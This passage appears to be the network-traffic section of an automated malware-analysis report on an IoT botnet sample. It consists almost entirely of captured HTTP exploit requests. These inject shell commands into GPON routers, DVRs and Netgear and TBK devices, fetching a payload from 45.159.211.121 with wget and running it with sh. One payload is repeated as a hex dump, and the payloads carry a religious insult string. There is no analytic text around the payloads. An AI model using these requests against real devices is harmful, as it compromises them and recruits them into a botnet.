http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.2Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.5Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.5Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.8Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.5Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.8Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.6Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.8Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.8Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.6Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.6Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.228.222.241Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.13Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.13Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.13Connection: close
